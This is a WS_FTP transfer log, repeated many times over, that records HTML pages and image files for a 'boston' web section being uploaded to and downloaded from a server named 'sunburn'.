10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
